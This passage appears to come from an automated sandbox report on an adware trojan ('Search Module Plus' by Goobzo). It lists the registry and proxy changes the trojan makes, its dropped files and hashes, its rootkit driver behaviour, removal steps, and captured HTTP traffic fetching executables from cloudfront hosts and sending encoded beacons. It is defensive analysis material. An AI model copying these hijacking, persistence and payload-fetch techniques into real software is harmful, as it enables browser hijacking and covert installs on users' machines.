"FaviconURL" = "http://www-searching.com/favicon.ico"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"ConsoleTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process tcpsvcs.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\SearchModulePlus\Info]
"Version" = "2.3.12.1634"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Plus" = "1"
"(Default)" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"
[HKLM\SOFTWARE\SearchModulePlus\Info]
"ExeLocation" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"DisplayIcon" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"UninstallString" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"DisplayName" = "Search Module Plus"
"Publisher" = "Goobzo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\SearchModulePlus\Info]
"Aff" = "FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,"
"UserId" = "732923889-1296844034-1208581001"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Install" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
Dropped PE files
MD5 | File path |
---|---|
c5bf0ea484893a959b3ef0e7f041f379 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll |
29f111a07a51d38b8379171d3cf39ddb | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe |
2dd50829f5ce91e033636553405263ca | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\Updater.exe |
a879b0ae2ad98ac8e1c0f8912837eb2d | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll |
5931f1438015a3e263226d6ea4a8b182 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\sma.exe |
675f7fdc1224c197df5e7eef84d1a8f9 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smci32.dll |
10ba4048085923cf264eaeee708e98ab | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smi32.exe |
4db4b7e64f2fb4e5394d085afb429280 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smp.exe |
556b1f1d6fd1f191c77b1167cd006abc | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smu.exe |
c9828a10a4b5644cf236b1cce749dddb | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smw.sys |
05c47da12b0009bd98653f51287f7768 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls loading of executable images into memory by installing the Load image notifier.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan the system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
smu.exe:2540
smu.exe:3356
sma.exe:308
sma.exe:4008
sma.exe:3164
sma.exe:3192
%original file name%.exe:3380
%original file name%.exe:264
smp.exe:3444
smp.exe:2836
tcpsvcs.exe:3488
tcpsvcs.exe:1504
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
C:\Windows\Temp\Pre83CF.tmp (601 bytes)
C:\Windows\Temp\Pre93AB.tmp (601 bytes)
C:\Windows\Temp\Web93AC.tmp (63 bytes)
C:\Windows\Temp\Pre83E0.tmp (601 bytes)
C:\Windows\Temp\Web83D0.tmp (63 bytes)
C:\Windows\Temp\Web83E1.tmp (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 2.11.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.11.0.999
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 760735 | 760832 | 4.56168 | a9cacf15e913be2edf8056b7b3c7c54e |
.rdata | 765952 | 234734 | 235008 | 3.03602 | c4a59491089058aee935dcac3ad25217 |
.data | 1003520 | 24872 | 9216 | 2.60093 | 4fa01dc463d1d2fe998b6fb156e49847 |
.rsrc | 1032192 | 30912 | 31232 | 3.43692 | ffbcb515ad454512ea92926edc9d30de |
.reloc | 1064960 | 48620 | 48640 | 4.61783 | 73b154c681e17bd08459beb64281acae |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /bxsdk32.dll HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dyd9qf154h76q.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 942080
Connection: keep-alive
Date: Thu, 16 Mar 2017 13:47:42 GMT
Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT
ETag: "05c47da12b0009bd98653f51287f7768"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64835
X-Cache: Hit from cloudfront
Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: FsDAYkxk2XssNWIwo0JzA2LXQpVjlT2zjtCWJVvPC-tU_XcSyLk26w==
<<< skipped >>>
GET /SetterExeV18.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d11sfnc01fj8ag.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT
Accept-Ranges: bytes
ETag: "a670962874c9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:55 GMT
Content-Range: bytes 0-249999/520704
X-Cache: Miss from cloudfront
Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Id: MJpICvSj2Cydx-1WUjll0t1VA0m2Ma9kx_kASN-RYyDUhX-SsbfcrA==
<<< skipped >>>
GET /SetterExeV18.exe HTTP/1.1
Range: bytes=500000-520703
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d11sfnc01fj8ag.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 20704
Connection: keep-alive
Cache-Control: private
Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT
Accept-Ranges: bytes
ETag: "a670962874c9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
Content-Range: bytes 500000-520703/520704
X-Cache: Miss from cloudfront
Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 3GTcsb7j63vuDDgY2d3TJxFAlC8gP__tZGa3NEqL3Ij31jqEzaeSAA==
<<< skipped >>>
GET /SetterExeV18.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d11sfnc01fj8ag.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT
Accept-Ranges: bytes
ETag: "a670962874c9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:55 GMT
Content-Range: bytes 250000-499999/520704
X-Cache: Miss from cloudfront
Via: 1.1 0f0009772734d6975e26e0a8bc4716ea.cloudfront.net (CloudFront)
X-Amz-Cf-Id: nVRXnqt6YpKbRAvPpj1frNP0pGRh4MSG72XC7nZe3sGBVCslJyaepA==
<<< skipped >>>
GET /p.ashx?e=obiBp3WOda8YEV9pcuJwXtjCW9 eJMmAWub0ofDzkCEegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPkCN9h bV19VAhTD7v1xeC4pGvADS7bOhhWoLVpCM9iEhqt6HrlyoIuXkcHJamqYAkU5MDCXDxgXn558pQYeTa 1l 1OLNhgAaPzXL8pY6Nn8Drm/gTHnKRatpWcD7V21UixaxLjlbxVMF4Batz9n/4= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:55 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WDJQ_AmQCj3DOUvDNet276USb0n9R5Syp64R51jcdIB_hNelRlGALw==
....
GET /p.ashx?e=aQQpsP6/AW3U0UsIWSR1jVRnyF84anr3YDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB49De26f9ELU77BAEjXP3GmOBvq/txek z3knywc6xSb HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: I3wvhbsz-MuIPBOjIs_Buwbt20jDNtFQUhamXcycquB_sVRdm2wvCw==
....
GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTA30wp9ZePTAnJscN vLrCowpfd9Pvun2DZj3l0wecJba60LKguj6icg== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tpVNEEjPUKsR3xznGiKszFZH6K4UPVtvA5w5sq1NJ5ZqXWFHL7V4kg==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRlFU7gimmHq/JscN vLrCo14/JpwhTbJacCuTErr5qdU= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: N1k_BQdXgQSTh0-hwGBPdcvAa3SBdpFDQ3fU5nVaf4kKvysGzYRyyQ==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRDvO0EiF3oHTyyO6Ebs4xmkKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFf5JnRTepcv7VTVcd9MOBGUtwntjomLvg8OihZvFiIAIMn/yeJ21ljtcBdNV8N7h HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vj8wThi7a3s8evEhdgzuBZarQwn1qv6TW_2iC4uU7g1LavBzFHaLVQ==
....
GET /p.ashx?e=xY8ohDYpM gO8fn3umFd V2PNcPuKknMw/KXmUS MBMPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrl JfVwpv1Wva0hvOLfOrKD/wvFkFqnHHo4G r 3F6T7MDuG8rKmKv5M2lG/K85LIzCdXy2lTPRW3vJOpxfY9B1A6K4wtfvcx1y2OGa7t1CL4lfxm/XoqxEdjLvQZAWuHXAH fOgpHnMH6wMvCefXXf GeemgIzPxkm30CyQo1Eg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: C8rVeNrqvcLXnIosG24Fli_NXSvxLH2j51CFR7tAe8VeLJ5lTxwLZw==
....
GET /p.ashx?e=XJYuqQQo69dBmScQe cMuF2PNcPuKknMCkdmPrP3LyEPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrp7TtIX8b4qVoW979 PTPR/sLIuaJBIVfI4G r 3F6T7f9F3I6C91SWT/e9lpr/riA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KxTigRIEcxwbVd0v8l-Jwo1o5sj4ldFuNx8wfL38g27Bqi9y48bnpA==
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hbaBd5qR8ufkww3xXMGSlPc= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DKpiBbkiJrOz9FrXnZ89Ew1a4WB6hOyBGJjbT-U2db6JIslC6aDWuA==
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hYcizBU3y3xpkudLwF4whtg= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Og9L2kgUApwlrapQyHHerAfAMVdGprj0D5LF_xjtzjfOJNMnlr7p3Q==
....
GET /p.ashx?e=WL9usJOVMsOQs n7i1BIkNjCW9 eJMmApZtSBouT4jcegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPlLthe3E5HJFfRWApYRElbXqR4rzu9tChTEzQGoF c24CSOMVPCH eA= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: b9uR23ouXqBWjc9tDJU8OTmNowr0EMn16S7liZmnoeQeS72XVRw_VQ==
....
GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pMiQNTh4u5dqPxEMNdFi25Gw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: I2yw_weYa1bF4D36PoW1hN9W5PQOFh6-BUBVOz50hFEzo5ycZ2t6OQ==
....
GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hYcizBU3y3xpkudLwF4whtg= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: UF5lcNfBdJgA2UzQBxPBz2aP2HuF_tBQN193VZwLiY3Off-O-5QicA==
GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTAqiKuwJ2QNWAL/XWHChDxEUKABP6K/iqqggPnHli0tZCBSCbmHG3q6QlEj4/HBfPTcUDrej7Uo8w= HTTP/1.1
